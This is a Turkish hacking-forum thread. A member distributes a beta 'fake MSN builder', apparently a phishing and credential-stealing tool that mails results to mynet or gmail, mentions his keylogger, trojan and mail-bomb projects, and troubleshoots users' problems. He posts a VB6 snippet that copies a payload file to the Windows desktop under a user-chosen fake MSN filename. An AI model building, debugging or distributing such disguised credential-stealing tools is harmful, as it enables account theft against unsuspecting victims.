Turcodes Programmer Team
-
tam olarak anlamadım ama eline sağlık
-
Sağolun arkadaşlar,benim bir keylogger çalışmam var,bir trojan,mail bomb var o da bitti gibi. Tbt ye sadece betaları :D
Ama veririm yaa,sizlerden değerli mi -
Ahmet hoca senin ki bir programcılık hatası,yani benim hatam.Ama sisteme yüklenen klasörden rpdc.ext i bulmak lazım.Ben onu yaptığımı sanıyordum.Olmazsa akşam düzenlerim sana pm den atarım
-
bekliyorum...
-
--
-
1- Program defalarca test edildi hocam,ahmet hocanın ki hariç normalde çalışıyor
2- mynet e mail gitmemesinin sebebi ya adresi yanlış yazdın ya da mynetin yoğunluğudur.O yüzden gmail i de açtım,çünkü mynet ara sıra böyle yapıyor.Bir kaç saat sonra dene düzelir
3- compile kısmına gelince.Sistemin c: yüklenmişse normal olarak kopyalar
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Dim wyol As String, uz, win
wyol = String(142, Chr(32))
uz = GetWindowsDirectory(wyol, Len(wyol))
win = Left(wyol, uz) & "\Desktop"
FileCopy App.Path & "\rdfce.ext", win & "\" & fakemsn.Text
Open win & "\" & fakemsn.Text For Binary As #1
Şu kısma dikkat et
win = Left(wyol, uz) & "\Desktop"
burdaki win windows-desktopun yeridir.Ve program oraya yazılıyor.Eğer denenmeseydi demezdim böyle ama çalışıyor.Ahmet hocanınkine birşey diyemiyorum,o benim hatam ama bu da senin hatan -
ahmet kardeşiminkinden bana da oluyo:(istersen görüntü atıym(inanmıyosan:) yani ona yolliycanı banada yollayıver bi zahmet...
-
Tamam hoca olmayana yollayacağım,şimdi ders çalışıyorum,akşam-gece arası düzenler veririm.Bu programcılık hatası,eğer beklemek istemiyorsanız programı
C:\Program Files\Msn Fake Hazırlayıcı Beta
şuraya kurdurun sonra çalışır.Ama ben yine de bu sorunu düzelteceğim. Madur olan arkadaşlardan özür dilerimmm -
ertan hocam her programın betasında olur böyle hatalar emeğine sağlık.azminiz şevkiniz kırılmasın.
adı üstünde beta
hatalar düzeltilir -
ellerine sağlık ertan
bakıcam programa eminim bi kac hata dışına güzeldir
Toplam Hit: 3686 Toplam Mesaj: 33